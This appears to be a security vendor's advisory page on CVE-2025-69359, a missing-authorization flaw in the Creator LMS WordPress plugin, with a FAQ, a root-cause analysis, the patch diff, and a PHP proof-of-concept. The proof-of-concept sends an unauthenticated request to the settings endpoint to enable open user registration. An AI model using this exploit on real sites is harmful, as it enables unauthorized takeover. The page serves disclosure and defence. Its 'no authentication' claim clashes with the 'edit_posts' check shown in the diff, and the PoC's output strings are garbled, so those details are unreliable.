What is CVE-2025-69359?

CVE-2025-69359 is a medium severity vulnerability in the Creator LMS WordPress plugin, specifically versions up to 1.1.12. It is caused by a missing authorization check that allows unauthenticated users to perform unauthorized actions via a publicly exposed REST API endpoint.

How does the vulnerability work?

The vulnerability allows attackers to send POST requests to the `/wp-json/creatorlms/v1/settings` endpoint without authentication. This enables them to modify critical WordPress options by passing arbitrary key-value pairs, potentially compromising the entire site.

Who is affected by this vulnerability?

Any WordPress site using the Creator LMS plugin version 1.1.12 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard under the ‘Plugins’ section.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin area and locate the Creator LMS plugin. If the version is 1.1.12 or earlier, your site is at risk.

How can I fix the vulnerability?

To mitigate the vulnerability, update the Creator LMS plugin to version 1.1.13 or later. This version includes necessary security patches that address the missing authorization issue.

What does the CVSS score of 5.3 indicate?

The CVSS score of 5.3 indicates a medium severity level for this vulnerability. This means it poses a moderate risk to affected systems, with potential for significant impact if exploited.

What practical risks does this vulnerability pose?

Exploitation of this vulnerability can lead to unauthorized changes in site settings, including enabling user registration or altering admin emails. Such changes can facilitate site takeover or introduce malicious content.

What is a proof of concept (PoC) in this context?

The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a crafted JSON payload to the vulnerable endpoint. It serves as a demonstration of the ease with which the vulnerability can be exploited.

What changes were made in the patched version?

Version 1.1.13 of the Creator LMS plugin includes a revised permission callback that restricts access to users with the ‘manage_options’ capability, typically reserved for administrators. It also introduces validation for option keys to prevent arbitrary updates.

How can I further secure my WordPress site?

In addition to updating vulnerable plugins, ensure your WordPress installation and all themes are up to date. Regularly audit user permissions, implement strong passwords, and consider using security plugins that monitor for unauthorized changes.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Creator LMS plugin until it can be updated. Additionally, restrict access to the REST API or implement firewall rules to block unauthorized requests.

Where can I find more information about this vulnerability?

More information about CVE-2025-69359 can be found on the National Vulnerability Database and security advisory sites. Additionally, the Atomic Edge analysis provides detailed insights into the vulnerability and its implications.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-69359: Creator LMS <= 1.1.12 – Missing Authorization (creatorlms)

CVE ID CVE-2025-69359

Plugin creatorlms

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 1.1.12

Patched Version 1.1.13

Disclosed January 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69359:
The vulnerability is a Missing Authorization flaw in the Creator LMS WordPress plugin, affecting versions up to and including 1.1.12. It allows unauthenticated attackers to modify critical plugin settings via a publicly exposed REST API endpoint. The CVSS score of 5.3 reflects a medium severity impact.

Atomic Edge research identifies the root cause in the `creatorlms/includes/Rest/V1/SettingsController.php` file. The `update_items` function (line 210) was registered with a `permission_callback` pointing to `get_items_permissions_check` (line 48). This callback only required the `edit_posts` capability, which is typically held by low-privileged users like subscribers and contributors. More critically, the REST route registration lacked a proper capability check for unauthenticated requests, effectively allowing any site visitor to invoke the endpoint.

Exploitation involves sending a POST request to the WordPress REST API endpoint `/wp-json/creatorlms/v1/settings`. An attacker can craft a JSON payload containing any arbitrary `option_name` and `option_value` key-value pairs. The vulnerable `update_items` function would pass these directly to WordPress’s `update_option` function. This allows an attacker to modify any WordPress option the web server can write, not just those intended for the plugin.

The patch in version 1.1.13 implements two key fixes. First, it changes the `permission_callback` for the `update_items` route from `get_items_permissions_check` to `update_items_permissions_check` (line 48). Second, it updates both permission check functions to require the `manage_options` capability (lines 489 and 501), which is exclusive to administrators. The patch also introduces an `is_valid_option_key` validation function (line 228) that restricts updates to a predefined allowlist of plugin-specific options, preventing arbitrary option overwrites.

Successful exploitation grants an unauthenticated attacker the ability to modify any WordPress option stored in the database. This can lead to site takeover by enabling user registration, changing administrator emails, or injecting malicious scripts. Attackers could also disrupt site functionality by altering critical paths, payment gateways, or security settings. The impact is equivalent to obtaining administrative privilege over the plugin’s configuration and the broader WordPress site.

Differential between vulnerable and patched code

Code Diff

--- a/creatorlms/creatorlms.php
+++ b/creatorlms/creatorlms.php
@@ -3,7 +3,7 @@
  * Plugin Name:     Creator LMS
  * Plugin URI:      https://getwpfunnels.com/
  * Description:     Build, sell, and manage online courses easily with the best WordPress LMS plugin made for creators, coaches, and educators.
- * Version:         1.1.12
+ * Version:         1.1.13
  * Author:          WPFunnels Team
  * Author URI:      https://getwpfunnels.com
  * Text Domain:     creatorlms
--- a/creatorlms/includes/CreatorLMS.php
+++ b/creatorlms/includes/CreatorLMS.php
@@ -222,7 +222,7 @@
 	 *
 	 * @var string
 	 */
-	const VERSION = '1.1.12';
+	const VERSION = '1.1.13';

 	/**
 	 * Plugin slug.
--- a/creatorlms/includes/Rest/V1/SettingsController.php
+++ b/creatorlms/includes/Rest/V1/SettingsController.php
@@ -48,7 +48,7 @@
 				array(
 					'methods'             => WP_REST_Server::EDITABLE,
 					'callback'            => array( $this, 'update_items' ),
-					'permission_callback' => array( $this, 'get_items_permissions_check' ),
+					'permission_callback' => array( $this, 'update_items_permissions_check' ),
 				),
 				'schema' => array( $this, 'get_public_item_schema' ),
 			)
@@ -210,6 +210,10 @@
 			if ( 'payment-gateway' === $group_id && is_array( $value ) && isset( $value['value'] ) ) {
 				$value = $value['value'];
 			}
+
+			if ( ! $this->is_valid_option_key( $key ) ) {
+				continue;
+			}

 			update_option( $key, $value );
 			flush_rewrite_rules(true);
@@ -224,6 +228,76 @@
 	}

 	/**
+	 * Validate if the option key is valid.
+	 *
+	 * @param string $key The option key.
+	 * @return bool True if valid, false otherwise.
+	 *
+	 * @since 1.0.0
+	 */
+	private function is_valid_option_key( $key ) {
+		$keys = array(
+			'creator_lms_course_page_id',
+			'creator_lms_profile_page_id',
+			'creator_lms_checkout_page_id',
+			'creator_lms_thank_you_page_id',
+			'creator_lms_privacy_policy_page_id',
+			'creator_lms_terms_page_id',
+			'creator_lms_registration_page_id',
+			'creator_lms_courses_per_page',
+			'creator_lms_archive_page_layout',
+			'creator_lms_archive_page_layout_style',
+			'creator_lms_archive_page_filter_is_enabled',
+			'creator_lms_archive_page_filters',
+			'creator_lms_archive_page_sorting_is_enabled',
+			'creator_lms_archive_page_search_is_enabled',
+			'creator_lms_archive_page_category_is_enabled',
+			'creator_lms_archive_page_row',
+			'creator_lms_single_course_page_features',
+			'creator_lms_single_course_page_layout',
+			'creator_lms_columns_per_row',
+			'creator_lms_container_width',
+			'creator_lms_debug_mode',
+			'creator_lms_primary_color_scheme',
+			'creator_lms_primary_hover_color_scheme',
+			'creator_lms_heading_color_scheme',
+			'creator_lms_body_text_color_scheme',
+			'creator_lms_body_progress_color_scheme',
+			'creator_lms_checkout_page_layout_type',
+			'creator_lms_leaderboard_settings',
+			'creator_lms_privacy_policy_message',
+			'creator_lms_guest_checkout',
+			'creator_lms_allow_purchase_without_login',
+			'creator_lms_permalink',
+			'creatorlms_offline_settings',
+			'creatorlms_stripe_settings',
+			'creatorlms_paypal_settings',
+			'creatorlms_mollie_settings',
+			'creatorlms_razorpay_settings',
+			'creatorlms_authorize_net_settings',
+			'creator_lms_currency',
+			'creator_lms_currency_pos',
+			'creator_lms_price_thousand_sep',
+			'creator_lms_price_decimal_sep',
+			'creator_lms_price_num_decimals',
+			'creator_lms_tax_enabled',
+			'creator_lms_tax_label',
+			'creator_lms_prices_include_tax',
+			'creator_lms_eu_vat_enabled',
+			'creator_lms_disable_vat_validation',
+			'creator_lms_vat_number_label',
+			'creator_lms_fallback_tax_rate',
+			'creator_lms_existing_tax_rates',
+			'creator_lms_new_tax_rates',
+			'creator_lms_tax_rates',
+			'creator_lms_countries',
+			'creator_lms_states',
+		);
+		return in_array( $key, $keys, true );
+	}
+
+
+	/**
 	 * Get a single item (setting) for a specific group.
 	 *
 	 * @param WP_REST_Request $request The request object.
@@ -415,7 +489,7 @@
 	 * @since 1.0.0
 	 */
 	public function get_items_permissions_check( $request ) {
-		return current_user_can( 'edit_posts' );
+		return current_user_can( 'manage_options' );
 	}

 	/**
@@ -427,6 +501,6 @@
 	 * @since 1.0.0
 	 */
 	public function update_items_permissions_check( $request ) {
-		return current_user_can( 'edit_posts' );
+		return current_user_can( 'manage_options' );
 	}
 }
--- a/creatorlms/vendor/composer/installed.php
+++ b/creatorlms/vendor/composer/installed.php
@@ -5,7 +5,7 @@
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
-        'reference' => 'cf5619a591f5a719a7572ee5b34b39cc593c16ca',
+        'reference' => '0eb1ec396b40de0d6ec425c0493e2225c68dc51f',
         'name' => 'rextheme/plugin_name',
         'dev' => false,
     ),
@@ -36,7 +36,7 @@
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
-            'reference' => 'cf5619a591f5a719a7572ee5b34b39cc593c16ca',
+            'reference' => '0eb1ec396b40de0d6ec425c0493e2225c68dc51f',
             'dev_requirement' => false,
         ),
     ),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69359 - Creator LMS <= 1.1.12 - Missing Authorization

<?php

$target_url = 'http://vulnerable-site.local/wp-json/creatorlms/v1/settings';

// Malicious payload to demonstrate arbitrary option update.
// This example attempts to enable user registration, a high-impact change.
$payload = json_encode([
    'users_can_register' => 1 // Enables anyone to register on the site.
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Content-Length: ' . strlen($payload)
]);

// The exploit works without any authentication headers or cookies.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response Body: $responsen";

// A successful exploitation (on vulnerable versions) will return a 200 OK
// with a JSON response confirming the update.
if ($http_code == 200) {
    echo "[+] Vulnerability likely exploited. Site settings modified.n";
} else {
    echo "[-] Exploit attempt failed or site is patched.n";
}

?>

Frequently Asked Questions

What is CVE-2025-69359?
Overview of the vulnerability
CVE-2025-69359 is a medium severity vulnerability in the Creator LMS WordPress plugin, specifically versions up to 1.1.12. It is caused by a missing authorization check that allows unauthenticated users to perform unauthorized actions via a publicly exposed REST API endpoint.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send POST requests to the `/wp-json/creatorlms/v1/settings` endpoint without authentication. This enables them to modify critical WordPress options by passing arbitrary key-value pairs, potentially compromising the entire site.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Creator LMS plugin version 1.1.12 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard under the ‘Plugins’ section.
How can I check if my site is vulnerable?
Steps to verify plugin version
To determine if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin area and locate the Creator LMS plugin. If the version is 1.1.12 or earlier, your site is at risk.
How can I fix the vulnerability?
Updating the plugin
To mitigate the vulnerability, update the Creator LMS plugin to version 1.1.13 or later. This version includes necessary security patches that address the missing authorization issue.
What does the CVSS score of 5.3 indicate?
Understanding severity ratings
The CVSS score of 5.3 indicates a medium severity level for this vulnerability. This means it poses a moderate risk to affected systems, with potential for significant impact if exploited.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to unauthorized changes in site settings, including enabling user registration or altering admin emails. Such changes can facilitate site takeover or introduce malicious content.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a crafted JSON payload to the vulnerable endpoint. It serves as a demonstration of the ease with which the vulnerability can be exploited.
What changes were made in the patched version?
Security enhancements in version 1.1.13
Version 1.1.13 of the Creator LMS plugin includes a revised permission callback that restricts access to users with the ‘manage_options’ capability, typically reserved for administrators. It also introduces validation for option keys to prevent arbitrary updates.
How can I further secure my WordPress site?
Best practices for security
In addition to updating vulnerable plugins, ensure your WordPress installation and all themes are up to date. Regularly audit user permissions, implement strong passwords, and consider using security plugins that monitor for unauthorized changes.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Creator LMS plugin until it can be updated. Additionally, restrict access to the REST API or implement firewall rules to block unauthorized requests.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-69359 can be found on the National Vulnerability Database and security advisory sites. Additionally, the Atomic Edge analysis provides detailed insights into the vulnerability and its implications.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations